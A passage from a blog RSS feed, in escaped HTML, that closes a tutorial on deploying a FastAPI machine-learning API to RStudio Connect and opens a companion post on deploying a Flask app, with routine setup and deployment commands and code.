&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; petal_length: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; petal_width: float
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load target names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#a5d6ff"&gt;&amp;#34;target_names.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; target_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loadtxt(file, dtype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;str&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load models&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;classifiers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; model &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; ModelName:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; open(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;_model.joblib&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rb&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; file:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; classifiers[model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joblib&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;load(file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a FastAPI instance&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; FastAPI()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a POST endpoint to receive data and return the model prediction&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.post&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/predict/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{model_name}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict_model&lt;/span&gt;(data: IrisData, model_name: ModelName):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clf &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; classifiers[model_name&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; test_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sepal_length, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sepal_width, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;petal_length, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;petal_width]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; class_idx &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; clf&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;predict(test_data)[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#8b949e;font-style:italic"&gt;# predict model on data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#34;species&amp;#34;&lt;/span&gt;: target_names[class_idx]}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can run the server locally with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uvicorn fastapi_ml:app --reload
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now if you go to &lt;a href="http://127.0.0.1:8000/docs" rel="external"&gt;http://127.0.0.1:8000/docs&lt;/a&gt;, you should see a page that looks like this,&lt;/p&gt;
&lt;p&gt;&lt;img alt="ML API documentation homepage" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/api-doc.png" width="1846"&gt;&lt;/p&gt;
&lt;p&gt;You can test out your API by selecting the &amp;lsquo;POST&amp;rsquo; dropdown and then clicking &amp;lsquo;Try it out&amp;rsquo;.&lt;/p&gt;
&lt;p&gt;You can also test the response of your API for the KNN model with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X &lt;span style="color:#a5d6ff"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;http://127.0.0.1:8000/predict/KNN&amp;#39;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#39;accept: application/json&amp;#39;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#39;Content-Type: application/json&amp;#39;&lt;/span&gt; -d &lt;span style="color:#a5d6ff"&gt;&amp;#39;{&amp;#34;sepal_length&amp;#34;: 0,&amp;#34;sepal_width&amp;#34;: 0,&amp;#34;petal_length&amp;#34;: 0,&amp;#34;petal_width&amp;#34;: 0}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can get the response for the other models by replacing &amp;lsquo;KNN&amp;rsquo; with their names in the path.&lt;/p&gt;
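&lt;p&gt;If you would rather test the API from Python than from &lt;code&gt;curl&lt;/code&gt;, the sketch below builds the same POST request using only the standard library. The function names, the &lt;code&gt;BASE_URL&lt;/code&gt; constant and the example measurements are our own illustrative choices rather than part of the demo app, and the code assumes the server is running locally on uvicorn&amp;rsquo;s default port.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;# predict_client.py (hypothetical file name)

import json
import urllib.request

# Assumption: the API from fastapi_ml.py is running locally on the default port
BASE_URL = "http://127.0.0.1:8000"


def build_predict_request(model_name, measurements, base_url=BASE_URL):
    """Build a POST request for the /predict/{model_name} endpoint."""
    return urllib.request.Request(
        url=f"{base_url}/predict/{model_name}",
        data=json.dumps(measurements).encode("utf-8"),
        headers={"accept": "application/json", "Content-Type": "application/json"},
        method="POST",
    )


def predict(model_name, measurements, base_url=BASE_URL):
    """Send the request and return the decoded JSON response."""
    request = build_predict_request(model_name, measurements, base_url)
    with urllib.request.urlopen(request) as response:
        return json.load(response)


# Illustrative measurements (in cm) for a single iris flower
example = {
    "sepal_length": 5.1,
    "sepal_width": 3.5,
    "petal_length": 1.4,
    "petal_width": 0.2,
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the server running, calling &lt;code&gt;predict("KNN", example)&lt;/code&gt; should return a dictionary with a single &lt;code&gt;species&lt;/code&gt; key. Swapping in &lt;code&gt;"GaussianNB"&lt;/code&gt; or &lt;code&gt;"SVM"&lt;/code&gt; queries the other models.&lt;/p&gt;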
&lt;h3 id="deploying-to-rstudio-connect"&gt;Deploying to RStudio Connect&lt;/h3&gt;
&lt;p&gt;Deploying a FastAPI app to RStudio Connect is very similar to deploying a Flask app. First of all, we need to install &lt;code&gt;rsconnect-python&lt;/code&gt;, which is the CLI tool we will use to deploy.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install rsconnect-python
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you have not done so already, you will need to add the server that you wish to deploy to. The first step is to create an API key. Log into RStudio Connect and click on your user icon in the top left corner, navigate to &amp;ldquo;API Keys&amp;rdquo; and add a new API key.&lt;/p&gt;
&lt;p&gt;&lt;img alt="user menu icon" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/menu.png" width="1003"&gt;&lt;/p&gt;
&lt;p&gt;Remember to save the API key somewhere as it will only be shown to you once!&lt;/p&gt;
&lt;p&gt;It is also useful to set an API key environment variable in our &lt;code&gt;.env&lt;/code&gt; file. This can be done by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export CONNECT_API_KEY=&amp;lt;your_api_key&amp;gt;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you wish, you can also add an environment variable for the server you are using,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;CONNECT_SERVER&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;your server url&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the server URL is the part of the URL that comes before &lt;code&gt;connect/&lt;/code&gt; and must include a trailing slash.&lt;/p&gt;
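&lt;p&gt;As a quick illustration of that rule, the small helper below derives the server URL from an address copied out of the browser. The function name and the &lt;code&gt;rsc.example.com&lt;/code&gt; host are made up for this sketch, and it assumes the address contains a &lt;code&gt;/connect/&lt;/code&gt; path segment.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;# Assumption: the dashboard URL contains a "/connect/" path segment
def connect_server_url(dashboard_url):
    """Return the part of the URL before connect/, with a trailing slash."""
    base, _, _ = dashboard_url.partition("/connect/")
    return base.rstrip("/") + "/"


# rsc.example.com is a placeholder host, not a real server
print(connect_server_url("https://rsc.example.com/connect/#/content"))
# prints https://rsc.example.com/
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The printed value is what you would then store in &lt;code&gt;CONNECT_SERVER&lt;/code&gt;.&lt;/p&gt;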
&lt;p&gt;Now we can add the server with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect add --server &lt;span style="color:#79c0ff"&gt;$CONNECT_SERVER&lt;/span&gt; --name &amp;lt;server nickname&amp;gt; --api-key &lt;span style="color:#79c0ff"&gt;$CONNECT_API_KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check the server has been added and view its details with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Before we deploy our app, there is one more thing to watch out for. Unless you have a &lt;code&gt;requirements.txt&lt;/code&gt; file in the same directory as your app, RStudio Connect will freeze your current environment. Therefore, make sure you run the deploy command from the virtual environment in which you created your FastAPI app, since that is the environment it will run in on the server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Aside&lt;/strong&gt; When writing this blog I found there is a bug in pip/ubuntu which adds &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; when freezing the environment. This causes an error when trying to deploy. To get around this you can create a &lt;code&gt;requirements.txt&lt;/code&gt; file for your current environment and exclude &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip freeze | grep -v &lt;span style="color:#a5d6ff"&gt;&amp;#34;pkg-resources&amp;#34;&lt;/span&gt; &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we deploy we will also need to tell RStudio Connect where our app is located. We do this with an &lt;code&gt;--entrypoint&lt;/code&gt; flag which is of the form &lt;em&gt;module name:object name&lt;/em&gt;. By default RStudio Connect will look for an entrypoint of &lt;em&gt;app:app&lt;/em&gt;.&lt;/p&gt;
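&lt;p&gt;To make the &lt;em&gt;module name:object name&lt;/em&gt; convention concrete, here is a minimal sketch of how such a string can be resolved in Python. This is only an illustration of the general idea and not how RStudio Connect itself loads your app; the &lt;code&gt;resolve_entrypoint&lt;/code&gt; function is our own hypothetical helper, and we use the standard library&amp;rsquo;s &lt;code&gt;json&lt;/code&gt; module as a stand-in so the example runs anywhere.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;import importlib


def resolve_entrypoint(entrypoint="app:app"):
    """Import the named module and return the named object from it."""
    module_name, _, object_name = entrypoint.partition(":")
    module = importlib.import_module(module_name)
    return getattr(module, object_name)


# Standard-library stand-in for illustration;
# with the files from this post you would pass "fastapi_ml:app" instead.
dumps = resolve_entrypoint("json:dumps")
print(dumps({"status": "ok"}))
# prints {"status": "ok"}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In other words, &lt;code&gt;fastapi_ml:app&lt;/code&gt; points at the &lt;code&gt;app&lt;/code&gt; object defined in &lt;code&gt;fastapi_ml.py&lt;/code&gt;, just as it does in the &lt;code&gt;uvicorn fastapi_ml:app&lt;/code&gt; command we used earlier.&lt;/p&gt;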
&lt;p&gt;We are now ready to deploy our ML API by running,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect deploy fastapi -n &amp;lt;server nickname&amp;gt; . --entrypoint fastapi_ml:app
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;from the &lt;code&gt;fastapi-deploy-demo&lt;/code&gt; directory.&lt;/p&gt;
&lt;p&gt;Your ML API has now been deployed! You can check the deployment by following the output links which will take you to your API on RStudio Connect.&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;If you wish to learn more about FastAPI or deploying applications to RStudio Connect you may be interested in the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://fastapi.tiangolo.com/tutorial/" rel="external"&gt;FastAPI user guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/connect/user/publishing/" rel="external"&gt;Publishing to RStudio Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-posit-connect-deployment-management/" rel="external"&gt;Introduction to RStudio Connect course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python API deployment with RStudio Connect: Flask</title><link>https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/</link><pubDate>Thu, 25 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/flask.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our three-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Python API deployment with RStudio Connect: Flask (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi" rel="external"&gt;Part 2: Python API deployment with RStudio Connect: FastAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit" rel="external"&gt;Part 3: Python API deployment with RStudio Connect: Streamlit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/" rel="external"&gt;RStudio&lt;/a&gt; recently announced they are changing to &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;. Their publishing platform RStudio Connect (-&amp;gt; Posit Connect) is well known for providing the ability to deploy and share R applications such as &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; apps and &lt;a href="https://www.rplumber.io/" rel="external"&gt;Plumber&lt;/a&gt; APIs as well as plots, models and &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;RMarkdown&lt;/a&gt; reports. However, it is not just for R developers. RStudio Connect also supports a growing number of Python applications. Indeed &lt;a href="https://posit.co/" rel="external"&gt;posit.co&lt;/a&gt; states they are&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;embracing multi-lingual data science, creating open source and commercial software for R, Python, and beyond.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;One of the Python applications you can deploy to RStudio Connect is &lt;a href="https://flask.palletsprojects.com/en/2.1.x/" rel="external"&gt;Flask&lt;/a&gt;. Flask is a &lt;a href="https://wsgi.readthedocs.io/en/latest/" rel="external"&gt;WSGI&lt;/a&gt; (Web Server Gateway Interface) web application framework and provides a Python interface to enable the building of web APIs. It is useful to data scientists, for example for building interactive web dashboards and visualisations of data, as well as APIs for machine learning models. Deploying a Flask app to a publishing platform such as RStudio Connect means it can then be used from anywhere and can be easily shared with clients.&lt;/p&gt;
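&lt;p&gt;To make the WSGI acronym a little more concrete, here is a minimal sketch of a bare WSGI application written with only the Python standard library. This is not Flask code and it is not needed for the deployment; the names &lt;code&gt;hello_app&lt;/code&gt; and &lt;code&gt;call_app&lt;/code&gt; are hypothetical and only illustrate the kind of interface that Flask wraps for you.&lt;/p&gt;

```python
from wsgiref.util import setup_testing_defaults


def hello_app(environ, start_response):
    """A bare WSGI application: a callable that takes the request
    environ and a start_response callback."""
    body = b"Hello, World!"
    headers = [
        ("Content-Type", "text/plain; charset=utf-8"),
        ("Content-Length", str(len(body))),
    ]
    start_response("200 OK", headers)
    # WSGI applications return an iterable of bytes
    return [body]


def call_app(app, path="/"):
    """Call a WSGI app directly, without a web server (hypothetical helper)."""
    environ = {}
    setup_testing_defaults(environ)  # fill in a minimal, valid request environ
    environ["PATH_INFO"] = path
    captured = {}

    def start_response(status, headers, exc_info=None):
        # Record what the application reports instead of sending it over a socket
        captured["status"] = status
        captured["headers"] = headers

    body = b"".join(app(environ, start_response))
    return captured["status"], body


status, body = call_app(hello_app)
print(status, body.decode("utf-8"))
```

&lt;p&gt;A Flask &lt;code&gt;app&lt;/code&gt; object is itself a WSGI callable of this shape, which is why any WSGI-compatible server can host it.&lt;/p&gt;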
&lt;p&gt;This blog post focuses on how to deploy a Flask app to RStudio Connect. We will use a simple example but won&amp;rsquo;t go into detail on how to create Flask apps. If you are getting started in Flask you may find this &lt;a href="https://flask.palletsprojects.com/en/2.1.x/tutorial/" rel="external"&gt;tutorial&lt;/a&gt; useful.&lt;/p&gt;
&lt;h2 id="creating-your-first-flask-app"&gt;Creating your first Flask app&lt;/h2&gt;
&lt;p&gt;First things first, we will need to create a project directory and install Flask in a virtual environment.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a project directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir flask-deploy-demo &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd flask-deploy-demo
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a virtual environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install flask&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install flask
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For this example we will just use a basic hello world app. Create a file for the app with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch flask_demo.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and copy in the code below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# flask_demo.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hello&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Hello, World!&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then check that our app is working by running it locally. By default Flask looks for an application called &lt;code&gt;app.py&lt;/code&gt; or &lt;code&gt;wsgi.py&lt;/code&gt; in the current directory. As we have called our app something different, we first need to set a &lt;code&gt;FLASK_APP&lt;/code&gt; environment variable so that Flask knows where to look. You can set this variable in a &lt;code&gt;.env&lt;/code&gt; or &lt;code&gt;.flaskenv&lt;/code&gt; file and source it with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export FLASK_APP=&amp;#34;flask_demo&amp;#34;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
